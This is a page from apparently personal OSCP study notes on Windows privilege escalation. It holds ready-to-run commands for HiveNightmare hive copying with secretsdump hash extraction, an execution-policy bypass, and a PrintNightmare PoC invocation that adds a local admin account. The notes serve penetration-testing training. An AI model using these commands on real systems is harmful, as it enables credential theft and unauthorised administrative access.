M4RCG04M
  • 👨‍💻Welcome to my GitBook
  • WRITEUPS
    • HackTheBox
      • Windows
        • Remote
      • Linux
        • Jarvis
        • Tabby
    • Proving Grounds Play
      • BBScute
      • FunBoxEasyEnum
      • Monitoring
      • Loly
      • Pelican
      • Payday
      • Snookums
  • OSCP Preparation List
    • Hack The Box
    • Proving Grounds
  • NOTES
    • UTILS
      • Useful Files
      • Payloads
      • Lateral Movement
    • ENUMERATION
      • Port 79 (finger)
      • Port 80 (HTTP)
      • Port 111 (RPCBIND)
      • PORT 161/udp (SNMP)
      • PORT 389,636,3268,3269 (LDAP)
      • Port 6697 (IRCD)
      • Database Analysis
      • Grafana
    • FILE TRANSFERS
    • ACTIVE DIRECTORY
      • Known Vulnerabilities
      • Without Credentials
        • Classic Attacks
      • With Username
      • Valid Credentials
      • Lateral Move
      • ACLs/ACEs permissions
      • Active Directory Certificate Services (AD CS)
      • Administrator account
      • Domain Admin
    • EXPLOTATION
      • Port 53 (DNS)
      • Port 80 (HTTP)
        • CMS
        • SQL INJECTION
        • XXE
        • File Upload
        • Cross Site Scripting (XSS)
      • Port 3389 (RDP)
      • Password Attacks
        • Hash Cracking
    • PRIVILEGE ESCALATION
      • Windows
        • Enumeration
        • Windows User Privileges
        • Windows Group Privileges
        • Weak Permissions
        • Windows Vulnerabilities
        • Credential Hunting
        • Tools
      • Linux
        • Enumeration
Powered by GitBook
On this page
  • HiveNightmare.exe
  • PrintNightmare
  1. NOTES
  2. PRIVILEGE ESCALATION
  3. Windows

Windows Vulnerabilities

PreviousWeak PermissionsNextCredential Hunting

Last updated 12 days ago

HiveNightmare.exe

This can be used to perform the attack, creating copies of the aforementioned registry hives:

.\HiveNightmare.exe

These copies can then be transferred back to the attack host, where impacket-secretsdump is used to extract the hashes:

impacket-secretsdump -sam SAM-2021-08-07 -system SYSTEM-2021-08-07 -security SECURITY-2021-08-07 local

PrintNightmare

Checking for Spooler Service

We can quickly check if the Spooler service is running with the following command. If it is not running, we will receive a "path does not exist" error.

ls \\localhost\pipe\spoolss

Adding Local Admin with PrintNightmare PowerShell PoC

First start by bypassing the execution policy on the target host:

Set-ExecutionPolicy Bypass -Scope Process

Now we can import the PowerShell script and use it to add a new local admin user.

https://github.com/calebstewart/CVE-2021-1675

Import-Module .\CVE-2021-1675.ps1
Invoke-Nightmare -NewUser "hacker" -NewPassword "Pwnd1234!" -DriverName "PrintIt"
PoC